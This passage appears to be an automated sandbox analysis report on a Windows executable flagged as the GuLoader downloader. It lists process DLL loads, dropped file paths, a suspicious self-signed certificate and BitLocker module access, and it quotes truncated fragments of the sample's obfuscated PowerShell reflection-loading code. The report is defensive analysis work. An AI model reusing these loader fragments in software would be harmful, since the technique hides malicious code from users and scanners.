            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000005.00000002.2126368645.0000000005712000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1284819779.000000000A212000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Spokesperson $Leucoindigotin206 $retsbgernes), (Sjofelist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tillukningen = [AppDomain]::CurrentDomain.GetAsse
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dagbladsartikel)), $Computerfolk).DefineDynamicModule($Reavowal, $false).DefineType($Brachering, $Walled, [System.MulticastDelegate])$
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0451A677 push eax; iretd 2_2_0451A701
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0451EAF8 push eax; mov dword ptr [esp], edx2_2_0451EB0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D42A51 push es; iretd 2_2_08D42A52
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE9FE4 push esp; iretd 5_3_23DE9FE5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE779A push edi; retf 5_3_23DE779B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE358C push es; ret 5_3_23DE35B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE49A1 push es; ret 5_3_23DE49C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE5550 push edi; ret 5_3_23DE5565
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE5D01 push es; retf 5_3_23DE5D5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE72CE push edx; retf 5_3_23DE7333
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE6C9E push edx; retf 5_3_23DE6D03
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE5EB0 push edi; ret 5_3_23DE5EC5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE5470 push eax; ret 5_3_23DE5471
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E5434 push es; retf 5_2_061E5448
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E3427 pushfd ; retf 5_2_061E3428
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E5449 push es; retf 5_2_061E544C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E5A5F push es; ret 5_2_061E5A70

            Persistence and Installation Behavior

            barindex
            AI detected suspicious PE digital signature
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Scoliid' is not a known legitimate company. 3) Email domain 'Ezekiel.Di' is highly suspicious and not a legitimate business domain. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible certificate manipulation. 5) Location inconsistency: Petersburg and New York State combination is unusual. 6) Organization unit name 'Servitor Schenkels' appears randomly generated or meaningless. 7) The email 'Nonprophetic@Ezekiel.Di' uses unusual terms and a suspicious TLD (.Di) that's not commonly used for legitimate business. These characteristics strongly indicate this is likely a malicious certificate created to masquerade as legitimate software.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exeJump to dropped file
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile created: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
